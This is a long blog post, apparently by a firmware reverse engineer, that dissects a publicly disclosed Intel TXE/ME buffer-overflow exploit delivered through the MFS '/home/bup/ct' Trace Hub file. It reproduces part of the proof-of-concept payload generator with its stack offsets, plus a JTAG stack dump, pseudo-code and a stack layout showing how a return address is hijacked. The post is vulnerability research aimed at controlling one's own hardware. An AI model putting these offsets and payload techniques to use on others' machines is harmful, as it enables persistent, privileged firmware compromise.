Let me tell you a story…. (I think I’ll start all my blog posts with that considering how long they always end up being)

I’ve been working for a while now on trying to reproduce the Intel vulnerability that PT Research has disclosed at BlackHat Europe 2017 and I’ve succeeded and wanted to share my journey and experience with everyone, in the hope that it helps others take control of their machines (and not the other way around).

First, for those who are unaware, Positive Technologies (referred to here as ‘PT Research‘, ‘PT Security‘ or just ‘PT‘), have released information at BlackHat 2017 about a way to run unsigned code on the Intel Management Engine. And for those who are unaware, the Intel ME is a ‘security’ processor that runs on every Intel chip (since 2006) and that supposedly has full access to our systems. You can read more about it here and here, but the description that I’ve read and that stuck the most with me is this one from Libreboot’s FAQ (though it is a little outdated).

What’s the Intel Management Engine ?

In summary, the ME (Management Engine) is a second processor embedded in every PCH (the motherboard’s chipset) which runs with the highest privilege possible, it runs its own Intel-signed firmware, and takes care of a lot of things that you don’t know it does, the mainly known one being AMT (Intel Active Management Technologies) which allows a system administrator to remote access, control, update, reformat, KVM, etc.. a computer through the network, and that’s even if the computer is turned off. It’s called “out of bands” management, because it doesn’t work with a software running on the main CPU (like teamviewer/skype remote desktop or anything like that), but it works even if your entire OS is corrupted, or has a virus, or the machine is actually turned off.

That’s pretty scary, and if you’re wondering why Intel did this, well the rationale is that when you’re a system administrator in a company that has thousands of computers, or a university or even a small business with a dozen computers, and you want to update them all to a newer security update or whatever, then you can do it all at once from the comfort of your chair, and you don’t need to go through the entire building, and insert a USB key into each machine, and turn on those machines that were powered off, etc.. The real question however is why, for consumers, is the option to disable the ME not available ? As a regular user, I don’t need that ability to remotely control my machine, so I want to disable it, but I can’t. This has led to a lot of FUD (Fear, Uncertainty & Doubt) surrounding the ME as a way for Intel to control the world!

Intel CEO

I wanted to figure out what was truth and was wasn’t as I dug deep into reverse engineering and poking at the ME. The ME does have a legitimate function, but it does so much more now, as it takes care of the hardware initialization, the main CPU boot up, control of the clock registers, DRM management for Audio/Video, software based TPM and more. Those extra tasks are supposedly why it cannot be deactivated for consumer products. It unfortunately also means that you have to trust that Intel isn’t doing anything malicious (or allowing others to do something malicious by their incompetence). It’s not that I think Intel are malicious, but that doesn’t mean I trust them implicitly either. I’ve started to look into the ME, trying to get my code to execute on it, using the exploit PT had divulged and I took on the mission of getting the ME to control and spy on my USB devices. This started when I was still working with Purism, but even after I left that company, I continued working on this, on and off, for a little over a year now and I’ve finally made enough progress that I think it warrants writing something about it. Especially since I’ve ‘revived’ this blog in the last month with a couple of posts about reverse engineering too.

First things first. The Intel Management Engine (IME) or Management Engine (ME) is also called the CSME (Converged Security and Management Engine) or just CSE (Converged Security Engine) and sometimes called TXE (Trusted eXecution Engine) or SPS (Server Platform Services) and it used to be called Intel Management BIOS Extension (IMEBx).. It can get quite confusing.. especially considering that “the ME” can refer both to the Management Engine processor core itself and the Management Engine firmware which are both often indistinguishable of each other. I haven’t looked at the IMEBx (it’s old) or the SPS (don’t care about servers), but I think we can safely say that the ‘CSE’ and ‘CSME’ are the hardware cores, and the ‘TXE’ and ‘ME’ are their firmwares, respectively. I’m not sure if it’s exactly true, as I’ve heard ‘CSME’ also refer to the firmware, not just the hardware, but mostly all of these terms are interchangeable and I’ve seen Intel documents used them interchangeably as well.

I can also say with fair certainty that the CSE and CSME are both the same thing, they are the same hardware as far as I can see, and their firmware is pretty much the same. The CSE is used for ‘low power/cheap’ platforms, such as Celeron/Apollolake for example (set-top boxes, netbooks, cheap and underpowered laptops, etc..), while CSME is used for ‘desktop/laptop’ high end CPUs such as Skylake, Kabylake, CoffeLake, etc… The main difference between the two is that CSE doesn’t include the AMT (remote administration feature) while CSME does include it. The CSE runs the TXE firmware which is the exact same as the ME firmware, but again without the AMT features. I obviously can’t try to run the ME firmware on an Apollolake with the CSE because each version will only work for one platform (hardware initialization/registers being specific per platform), but looking at their code, I can say that they are pretty much identical, one does more than the other, but it’s the same code, same base architecture/functioning. TXE/CSE is probably just cheaper for Intel because there are less features for them to test/QA before release.

In this post, I will be talking about both the CSE and CSME, because PT Research has released their exploit so we can run our own code on the Apollolake platform (running TXE on CSE) and what I’ve done is both play with that and also port it to work on the Skylake platform (running ME on CSME).

Understanding the CSE exploit in order to do the CSME exploit

The first thing I want to explain is how to run your own code on the CSE (TXE v3.0). This will be pretty long, so I think I’ll divide this article into 3 posts, one that I will try to write each day. First, understanding the CSE exploit, then porting the exploit to CSME, then how to play around with the USB controller through the ME.

You can already refer to Positive Technologies’ presentation given by Mark Ermolov and Maxim Goryachy at BlackHat Eruope 2017. You can download their slides here and presentation here. It explains everything (mostly) of what you need to do. Then you can have a look at their Proof of Concept release of the exploit on github for Apollolake systems.

Before you go further, this post isn’t going to be like my previous posts that try to explain things on a very basic level (and often fail at remaining basic the further along you read). This is going to get very technical very fast, and before you continue, you need to read and understand the exploit as explained in the presentation by PT linked above. If you can’t follow it, then you’re just going to get lost, as I am assuming that you’ve read it and understood it all.

Here’s a quick summary of the exploit PT have divulged in their presentation :

The ME firmware consists of multiple ‘partitions’, one of them being the ‘MFS’ partition (ME File System) which contains various configuration files.

While most partitions are signed and cannot be modified as they contain code, the MFS partition is not and can therefore be modified by us mortals. There are additional restrictions in it that makes not all of the files user-modifiable.

A file in the MFS partition named "/home/bup/ct" is used to initiatize the Trace Hub Configuration of the ME and is user-modifiable.

is used to initiatize the Trace Hub Configuration of the ME and is user-modifiable. The ME process BUP (Hardware Bring-UP) reads the entire "/home/bup/ct" file into a buffer of size 808 without checking that the file will fit : we have a buffer overflow exploit here.

file into a buffer of size 808 without checking that the file will fit : we have a buffer overflow exploit here. There is a security-cookie/stack-guard that protects the ME against buffer overflows, making the buffer overflow exploit useless.

At the very bottom of the stack (the first 0x18 bytes of the stack) resides the TLS structure (Thread Local Storage) which contains a pointer to the syslib context.

The "/home/bup/ct" file is read in chunks of 64 bytes, and copied into a shared memory block

file is read in chunks of 64 bytes, and copied into a shared memory block Writing to the shared memory block (with sys_write_shared_mem function) causes it to read the destination address from the shared memory block descriptor that resides in the syslib context structure

function) causes it to read the destination address from the shared memory block descriptor that resides in the syslib context structure Overwriting the stack all the way to the bottom in order to overwrite the syslib context, pointing it to a custom-made shared memory block which has the destination address pointing to the memcpy ‘s return address lets us control where we want the function to return, thus bypassing the security-cookie/stack-guard protection that is in place

‘s return address lets us control where we want the function to return, thus bypassing the security-cookie/stack-guard protection that is in place By using both the buffer overflow exploit and the TLS/syslib-context/shared-memory exploit, we can control the code that gets executed using ROPs : running our own unsigned code.

Using another presentation from Positive Technologies, this time at the 34th Chaos Communication Congress, we can see that the Intel chipsets support JTAG which allows full debugging capabilities. In order to be able to JTAG the ME core itself, we would need to have ‘RED’ level unlock. See this little helpful table, taken from yet another Positive Technologies presentation (BlackHat Asia 2019)

All we need to enable RED unlock is to set value 3 to the DfX Aggregator register. Pretty easy to do once we have our own code running on the ME, so we can create a ROP chain that can be used to enable DCI and Red Unlock mode and allows us full ME JTAG control by another PC over USB.

Something you might not realize at first (and I didn’t until I dug deep) is that the exploit explained in the BlackHat Europe 2017 presentation is very different from what they’ve released as their proof of concept. The buffer overflow in reading the “ /home/bup/ct" file is the same, but that’s the easy part (hard to find, but easy to use : write a file with a size more than 808 bytes). I don’t know why, don’t ask, and I haven’t asked them either, but they decided to release the proof of concept for Apollolake (TXE 3.x) rather than for Skylake (ME 11.x) even though their presentation was about how to exploit it on Skylake. I figured that if I wanted to port their exploit to skylake, I needed to first understand how it works on Apollolake then it should just be a matter of finding the right offsets for my version of the ME on Skylake, right?… No. It actually took me a long time to figure out that what they are doing is a different exploit. In their presentation they were talking about how they overwrite the TLS with the syslib context in order to take over the shared memory destination address so they can control the memcpy for overwriting their function’s return address and bypass the stack guard security cookie .

The problem with that method is that it requires two read, the first one is to overwrite the TLS/syslib context, and the second one to cause the memcpy operation that lets the exploit happen. On skylake, it’s not a problem, the "/home/bup/ct" file gets read in chunks of 64 bytes, so you overwrite the syslib context with one chunk then you overwrite your return address with the next chunk. On Apollolake unfortunately, it doesn’t seem to use chunked reads. Because it’s a simplified firmware, the MFS (ME File System) on the flash is different I assume, and the file is read in one shot. Which means that the exploit in the presentation cannot be used. So… what do they do ?

The TXE Exploit

If you follow their instructions in their IntelTXE-PoC repository, you’ll see that the entire TXE exploit is stored in the "/home/bup/ct" file (Trace Hub Configuration) which gets generated by the me_exp_bxtp.py script. That’s the file you generate and by configuring the ME using Intel’s tools, setting the CT file in the “Trace Hub Configuration” field, the exploit happens. But what does it do exactly? What’s in that file? The script that generates it has unfortunately a few magic numbers that took me a long time to figure out. Let’s look at them :

STACK_BASE = 0x00056000 BUFFER_OFFSET = 0x380 SYS_TRACER_CTX_OFFSET = 0x200 SYS_TRACER_CTX_REQ_OFFSET = 0x55c58 RET_ADDR_OFFSET = 0x338 def GenerateTHConfig(): print("[*] Generating fake tracehub configuration...") trace_hub_config = struct.pack("<B", 0x0)*6 trace_hub_config += struct.pack("<H", 0x2) trace_hub_config += struct.pack("<L", 0x020000e0) trace_hub_config += struct.pack("<L", 0x5f000000) trace_hub_config += struct.pack("<L", 0x02000010) trace_hub_config += struct.pack("<L", 0x00000888) def GenerateRops(): print("[*] Generating rops...") # Let's ignore this for now def GenerateShellCode(): syslib_ctx_start = SYS_TRACER_CTX_REQ_OFFSET - SYS_TRACER_CTX_OFFSET data = GenerateTHConfig() init_trace_len = len(data) data += GenerateRops() data += struct.pack("<B", 0x0)*(RET_ADDR_OFFSET - len(data)) data += struct.pack("<L", 0x00016e1a) data += struct.pack("<L", STACK_BASE - BUFFER_OFFSET + init_trace_len) data_tail = struct.pack("<LLLLL", 0, syslib_ctx_start, 0, 0x03000300, STACK_BASE-4) data += struct.pack("<B", 0x0)*(BUFFER_OFFSET - len(data) - len(data_tail)) data += data_tail return data

I’ve ignored the ROPs, they’re not important for now, but if we look at the magic numbers, first, the STACK base address is 0x56000, cool, good to know.. where did they find it? no idea! Why is the buffer offset 0x380? What’s this 0x55c58 address that is SYS_TRACER_CTX_REQ_OFFSET ? Why is the RET_ADDR_OFFSET set to 0x338 ? And then all those magic values in the GenerateTHConfig function. At first, I thought that it was just a valid Trace Hub file and that if it didn’t start with those values, it would be rejected, but it turns out those values are important for the exploit to happen. Then that magic value 0x00016e1a that gets written on line 27 of the sample above.. what is that?

This article will answer all of those questions, as I’ve worked on reverse engineering the exploit itself. I will spare you all the reverse engineering and research I did on the ME itself in order to understand how the kernel creates its processes, how/where it sets up the stack, how the TLS structure gets created and by who (I wasted too much time looking at the kernel instead of just concentrating on the BUP process itself), I’ll look at that a little bit more in the next post.

After the exploit runs and I have a halted ME thread in the python console, I used the JTAG commands and dumped the stack to see what functions had run. I could follow every call that way and figured out what happened, who called who until the exploit was triggered. It’s probably a bit hard to read and I’m not going to try and explain it, but here’s the dump of the stack with my notes on the side showing what variables, registers and ret addresses are appearing on each line :

01bf:0000000000055950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055960: 00 00 00 00 cc 59 05 00 c8 59 05 00 18 00 00 00 -- garbage - push edi (in _memset_0) 01bf:0000000000055970: dc 18 00 00 40 30 09 00 ff ff ff ff 18 00 00 00 -- retaddr to _memset_0 - ebx (addr) - push 0xffffff (value) - push edi (length) 01bf:0000000000055980: 11 00 00 00 d1 01 00 00 22 00 00 00 b1 02 00 00 -- previously pushed ecx - ebx - esi - edi 01bf:0000000000055990: 04 5a 05 00 89 6d 00 00 04 30 09 00 d1 01 00 00 -- ebp 0x055a04 - retaddr to sub_1119 - var_54 - ebx 01bf:00000000000559a0: b0 02 00 00 3c 5a 05 00 d0 4d 02 00 70 5a 05 00 -- eax - LOCALS[0x54] 01bf:00000000000559b0: 04 30 09 00 44 90 09 00 d0 01 00 00 d2 02 00 00 01bf:00000000000559c0: 21 00 00 00 6f 03 00 00 ff 03 00 00 00 00 00 00 01bf:00000000000559d0: ff ff ff ff 00 00 00 00 84 30 09 00 84 30 09 00 01bf:00000000000559e0: 04 30 09 00 e1 00 00 00 02 01 00 00 91 00 00 00 01bf:00000000000559f0: d0 01 00 00 20 8e ff 6e 44 90 09 00 80 03 00 00 -- LOCALS[0x54] - ebx - esi 01bf:0000000000055a00: 00 30 09 00 50 5a 05 00 ee 6e 00 00 44 90 09 00 -- edi - ebp 0x055a50 - retaddr to sub_6CA2 - ebx 01bf:0000000000055a10: 04 30 09 00 00 04 00 00 00 4c 02 00 e0 00 00 00 -- ecx - eax - eax - eax 01bf:0000000000055a20: 01 00 00 00 70 5a 05 00 3c 5a 05 00 db f1 e8 6b -- eax - eax - eax - LOCALS[0x18] 01bf:0000000000055a30: 74 5a 05 00 40 5a 05 00 1d 84 01 00 03 00 00 00 01bf:0000000000055a40: 64 5a 05 00 ea 34 01 00 04 00 00 00 58 5a 05 00 -- LOCALS[0x18] - ebx - esi - ebp ** INVALID STACK ABOVE THIS POINT 01bf:0000000000055a50: bd 25 01 00 20 8e ff 6e 72 5a 05 00 00 00 00 00 -- retaddr to sys_get_ctx_struct_addr ** INVALID STACK ABOVE THIS POINT 01bf:0000000000055a60: d8 5a 05 00 a4 5a 05 00 4a 2a 01 00 72 5a 05 00 -- INVALID - ebp - retaddr to sub_134C6 - ebx 01bf:0000000000055a70: 20 00 43 02 00 02 08 00 0e 00 56 00 02 00 86 80 -- LOCALS[0x2C] 01bf:0000000000055a80: 80 03 00 00 04 00 00 00 94 5a 05 00 1d 84 01 00 01bf:0000000000055a90: 03 00 00 00 a0 5a 05 00 20 8e ff 6e 8c 5a 05 00 -- LOCALS[0x2C] - ebx 01bf:0000000000055aa0: 44 37 09 00 b8 5a 05 00 e5 2b 01 00 0e 00 56 00 -- esi - ebp - retaddr to sub_129C9 - arg0 ** INVALID STACK HERE AND ABOVE 01bf:0000000000055ab0: 04 00 00 00 c8 5a 05 00 10 6c 00 00 00 00 00 00 -- 4 - ebp 0x55aC8 sub_6A68 - retaddr to sub_6A50 - eax 01bf:0000000000055ac0: 0e 00 56 00 0e 00 00 00 f8 5a 05 00 62 84 00 00 -- X - X - ebp 0x55AF8 sub_8309 - retaddr to sub_6a68 01bf:0000000000055ad0: 80 03 00 00 00 8e ff 6e 8c 5a 05 00 80 03 00 00 -- LOCALS[0x1C] 01bf:0000000000055ae0: 44 37 09 00 28 5b 05 00 20 8e ff 6e 00 00 00 00 -- LOCALS[0x1C] - ebx 01bf:0000000000055af0: 80 03 00 00 44 37 09 00 28 5b 05 00 2a 81 02 00 -- esi - edi - ebp 0x55B28 sub_2808E - retaddr to sub_6082 01bf:0000000000055b00: 44 37 09 00 00 03 00 00 00 00 00 00 29 9a 07 00 -- edi - LOCALS[0x18] 01bf:0000000000055b10: 80 03 00 00 44 37 09 00 20 8e ff 6e 80 03 00 00 -- LOCALS[0x18] - ebx 01bf:0000000000055b20: 29 8a 07 00 64 5c 05 00 90 5b 05 00 28 99 02 00 -- esi - edi - ebp 0x55B90 bup_read_mfs_file - retaddr to sub_2A678 01bf:0000000000055b30: 29 9a 07 00 80 03 00 00 02 00 00 00 00 03 00 00 -- a1 - src_size (0x380) - sm_block_id (2) - proc_thread_id (0x300) 01bf:0000000000055b40: 00 03 00 00 00 00 00 00 01 00 00 00 ff ff ff ff -- proc_thread_id - a6, a7, a8 01bf:0000000000055b50: 00 00 00 00 01 00 00 00 00 00 00 00 68 5b 05 00 -- a9 - 10 - LOCALS[0x2C] - ebp 0x55b68 _get_tls_slot 01bf:0000000000055b60: 1d 84 01 00 03 00 00 00 8c 5b 05 00 ea 34 01 00 -- retaddr to get_tls_slot - arg0 (3), ebp 0x55b8c sub_134C6 - retaddr to sub_13495 01bf:0000000000055b70: 04 00 00 00 80 5b 05 00 bd 25 01 00 20 8e ff 6e -- X - ebp 0x55b80 sub_1253 - retaddr to sys_get_ctx_struct_addr - COOKIE ** INVALID 01bf:0000000000055b80: 9a 5b 05 00 00 00 00 00 04 00 00 00 cc 5b 05 00 -- LOCALS[0x2C] - ebx - esi - ebp 0x55bcc sub_129C9 01bf:0000000000055b90: 4a 2a 01 00 9a 5b 05 00 ac 5b 43 02 00 02 08 00 -- retaddr to sub_134C6 01bf:0000000000055ba0: 01 00 56 00 02 00 86 80 64 5c 05 00 48 5c 05 00 01bf:0000000000055bb0: 81 13 03 00 02 00 00 00 5f 73 6b 75 00 65 00 00 01bf:0000000000055bc0: 20 8e ff 6e 58 5a 05 00 00 00 00 00 e0 5b 05 00 -- LOCALS -- - ebp 0x55BCC sub_12BD6 ** INVALID 01bf:0000000000055bd0: e5 2b 01 00 01 00 56 00 f4 5b 05 00 ae 6f 00 00 -- retaddr to sub_129C9 * INVALID - X - ebp 0x55bf4 sub_6F3D - retaddr 0x6fae to sub_6A50 01bf:0000000000055be0: 00 00 00 00 02 00 00 00 01 00 56 00 02 00 00 00 -- add esp, 0C - ebx 01bf:0000000000055bf0: 80 5c 05 00 24 5c 05 00 bc 7a 00 00 00 00 00 00 -- esi - ebp 0x55c24 sub_7A91 - retaddr 0x7abc to sub_6f3D 01bf:0000000000055c00: 00 00 00 00 00 00 00 00 00 00 e0 01 e4 9b 04 00 01bf:0000000000055c10: 00 00 00 00 20 8e ff 6e 02 00 00 00 80 5c 05 00 01bf:0000000000055c20: 04 00 05 00 40 5c 05 00 9c 7c 00 00 00 00 00 00 -- LOCAL - ebp 0x55c40 sub_7C88 - retaddr 0x7c9c to sub_7A91 01bf:0000000000055c30: 04 00 00 00 0a 00 05 00 00 00 00 00 e4 9b 04 00 01bf:0000000000055c40: 50 5c 05 00 5e 69 00 00 0a 00 05 00 e4 9b 04 00 -- ebp 0x55c50 sub_6950 - retaddr 0x695e to sub_7C88 01bf:0000000000055c50: b4 5f 05 00 e4 9b 04 00 0a 00 05 00 07 00 00 00 -- ebp 0x55fb4 - retaddr 0x49be4 to sub_6078 01bf:0000000000055c60: bf 00 00 00 80 03 00 00 07 00 00 00 4b 52 4f 44 01bf:0000000000055c70: 14 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055c80: 00 00 00 00 00 00 02 00 e0 00 00 02 00 00 00 5f 01bf:0000000000055c90: 10 00 00 02 88 08 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055d60: 00 00 00 00 15 a8 04 00 c7 00 00 00 18 10 00 00 01bf:0000000000055d70: 39 a8 04 00 c7 00 00 00 08 10 00 00 01 00 00 00 01bf:0000000000055d80: c7 00 00 00 1c 10 00 00 15 a8 04 00 c7 00 00 00 01bf:0000000000055d90: 18 10 00 00 39 a8 04 00 c7 00 00 00 08 10 00 00 01bf:0000000000055da0: 01 00 00 00 c7 00 00 00 1c 10 00 00 00 01 00 00 01bf:0000000000055db0: 00 00 00 00 9f 01 00 00 00 00 00 00 10 10 00 00 01bf:0000000000055dc0: 77 a8 04 00 c7 00 00 00 08 10 00 00 be 11 00 00 01bf:0000000000055dd0: 76 a8 04 00 9f 01 00 00 00 84 00 00 03 00 00 00 01bf:0000000000055de0: 2d a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055f20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055f30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055f40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055f50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055f60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055f70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055fb0: 00 00 00 00 00 00 00 00 1a 6e 01 00 98 5d 05 00 -- pop ESP 0x55c98 01bf:0000000000055fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01bf:0000000000055ff0: 58 5a 05 00 0c 00 00 00 00 03 00 03 fc 5f 05 00

A couple of things first :

The stack is at offset 0x56000

The /home/bup/ct file gets read into offset 0x55C80

We can see the call to bup_read_mfs_file at 0x55b28, but the stack is corrupted all the way to 0x55BC0, meaning that all those functions above that line were called and already returned when the exploit happened. According to the assembly code, the TXE doesn’t read the file in chunks or copy it to shared memory, so by the time bup_dfs_read_file returns, no memcpy on shared memory was called and the exploit hasn’t run. The reason for that is that the file isn’t read into the stack then copied to a shared memory, instead, a shared memory block is created pointing to the stack, then reading the data gets it to the stack by using the sys_write_shared_mem function. So once the buffer overflow is done, the copy is also done.

If you’re wondering what I mean by bup_dfs_read_file and bup_read_mfs_file , here’s a little pseudo-code of how the TXE’s BUP module initializes itself from the entry point to the time the exploit runs (only relevant code is shown, and it’s over simplified). It shows the function calls that would appear in the stack, in the right order. If you want to follow along on IDA, it’s using TXE version 3.0.1.1107:

// sub_2604C // The entry point. First code executed after the kernel launches the BUP process void bup_entry() { // Initialize stack, tls, syslib, etc... // bup_init(); // then call the main function bup_main(); } // sub_35001 // The main function I assume which does most of everything void bup_main() { // All sorts of initialization of stuff // function1(); function2(); bup_run_init_scripts(); // Some more stuff // function3(); function4(); } // sub_355E0 // This runs 'scripts', it basically loops through an array of arrays // containing functions and calls each of those functions. // Each function will initialize one part of the hardware. void bup_run_init_scripts() { { // Simplification of what it does for (int i = 0; i < scripts.length; i++) scripts.function[i](); } // 0x4FDCC // Simplification of the scripts array, it actually is an array of structures, // each with an id and two script arrays within each structure. void *scripts = { bup_init_this, bup_init_that, bup_init_storage, bup_init_dci, bup_init_trace_hub, bup_init_other, // etc.. 94 total functions get called. } // sub_49842 // This initializes the trace hub functionality by reading the /home/bup/ct file. This is where the exploit happens. void bup_init_trace_hub() { char ct_data[808]; int file_size; int bytes_read; // again, simplification bup_dfs_get_file_size("/home/bup/ct", &file_size); bup_dfs_read_file("/home/bup/ct", 0, ct_data, file_size, &bytes_read); // Handle the content of the CT file // for () {} // bup_init_trace_hub_set_systracer(); // Stack Guard } // sub_3123B // This reads a file from storage int bup_dfs_read_file(char *file_name, int offset, char *buffer, unsigned int read_size, unsigned int *out_bytes_read) { // Complex function (250 lines) that ends up doing this, more or less : int shmem_blockid = create_shared_memory_block(sys_get_thread_id(), buffer, read_size); CFGRecord *file = get_cfg_file_record(file_name); bup_read_mfs_file(mfs_partition, file->offset + offset, shmem_blockid, read_size, out_bytes_read) release_shared_memory_block(shmem_blockid) // Stack Guard } // sub_297BA // Read the MFS file content and copies it to shared memory // the function is more complex than shown, its arguments as well, I've removed anything not important. int bup_read_mfs_file(void *mfs_partition, int offset, int shmem_blockid, unsigned int read_size, unsigned int *out_bytes_read) { *out_bytes_read = read_size; sys_write_shared_memory(shmem_blockid, mfs_partition + offset, read_size, read_size) // Stack Guard } // sub_AE87 // This is in the syslib module, not the BUP module. int sys_write_shared_memory(int blockid, void *src, int src_size, int write_size) { SHMem *block = get_shared_memory_block(blockid); memcpy(block->addr, src, write_size) // Stack Guard }

So, technically, according to the BlackHat presentation, when bup_read_mfs_file gets called, it reads the MFS file in chunks, and when it calls sys_write_shared_memory , it will execute our exploit, but from the stack that I dumped and analyzed above, that’s not what happens, because I can see the stack corrupted (overwritten by subsequent calls) that proves that bup_read_mfs_file has returned before the exploit happens, and then reverse engineering the code, I also see that there is no reading in chunks, which explains why things are different than in the presentation. So the exploit has to happen between the call to bup_dfs_read_file and the end of the bup_init_trace_hub , because the security cookie (stack guard) is destroyed by the buffer overflow so we can’t let bup_init_trace_hub return.. If we look at what happens in bup_init_trace_hub after the call to bup_dfs_read_file , then we see this :

void bup_init_trace_hub() { char ct_data[808]; int file_size; int bytes_read; // again, simplification bup_dfs_get_file_size("/home/bup/ct", &file_size) bup_dfs_read_file("/home/bup/ct", 0, ct_data, file_size, &bytes_read) CT *ct = (CT *)ct_data; for (uint16_6 i = 0; i < ct->num_entries; i++) { if (ct->entries[i].selector == 1) set_segment_word(7, ct->entries[i].offset, ct->entries[i].value) if (ct->entries[i].selector == 2) set_segment_word(0xBF, ct->entries[i].offset, ct->entries[i].value) } bup_init_trace_hub_set_systracer(7, 0xBF) } // sub_49AD3 // The following is a small function that gets called and sets flags on // the systracer context value and returns. bup_init_trace_hub_set_systracer(unsigned int seg1, unsigned int seg2) { // sys_get_sys_tracer_ctx() returns syslib_context + 0x200 char *systracer = sys_get_sys_tracer_ctx(); // Set the DWORD at address systracer + 0x10 to the first argument *(uint32_t *)(systracer + 0x10) = seg1; // Set bits 0 and 1 of systracer to 1 and clear bits 6 and 7 systracer[0] |= 3; systracer[0] &= 0x3F; // set bit 6 of systracer to the same as bit 3 of 0xBF:10 systracer[0] |= ((get_segment_word(seg2, 0x10) >> 3) & 1) << 6 // set bit 7 of systracer to the same as bit 7 of 0xBF:10 systracer[0] |= get_segment_word(seg2, 0x10) & 0x80 // Clear bits 8 and 9 of systracer systracer[1] &= 0xFC; // set bit 8 of systracer to the same as bit 11 of 0xBF:10 systracer[1] |= (get_segment_word(seg2, 0x10) >> 11) & 1 // set bit 9 of systracer to the same as bit 24 of 0xBF:E0 systracer[1] |= ((get_segment_word(seg2, 0xE0) >> 24) & 1) << 1; }

The systracer context is at syslib_ctx + 0x200 and if we look again at what the exploit from PT does, it sets the the syslib_ctx to 0x55a58 so the modified data (systracer) is at 0x55c58 which happens to be the return address of the function bup_init_trace_hub_set_systracer itself. Here’s what the stack actually looks like if we follow all the push/pop/call/ret from the entrypoint to the moment the exploit happens :

TXE STACK - bup_entry: 0x56000: STACK TOP 0x55FEC: TLS 0x55FE8: ecx - arg to bup_main 0x55FE4: edx - arg 0x55FE0: eax - arg 0x55FDC: retaddr - call bup_main 0x55FD8: saved ebp of bup_entry 0x55FD4: 0 - arg to bup_run_init_scripts 0x55FD0: retaddr - call bup_run_init_scripts 0x55FCC: saved ebp of bup_main 0x55FC8: saved edi 0x55FC4: saved esi 0x55FC0: saved ebx 0x55FBC: var_10 0x55FB8: retaddr - call bup_init_trace_hub 0x55FB4: saved ebp of bup_run_init_scripts 0x55FB0: saved esi 0x55FAC: saved ebx 0x55C64: STACK esp-0x348 0x55FA8: security cookie 0x55C80: ct_data 0x55C6C: si_features 0x55C68: file_size 0x55C64: bytes_read 0x55C60: 0xBF - arg to bup_init_trace_hub_set_systracer 0x55C5C: 7 - arg 0x55C58: retaddr - call bup_init_trace_hub_set_systracer 0x55C54: saved ebp of bup_init_trace_hub

So you can see that the systracer value that gets modified is at 0x55c58 which according to the stack is the return address of bup_init_trace_hub_set_systracer , if we look at the dump of the stack from before, you can also see that the value at 0x55c68 is indeed 7 as expected (due to *(uint32_t *)(systracer + 0x10) = seg1; ). If we can control the return value of our own function, then we control what we execute.

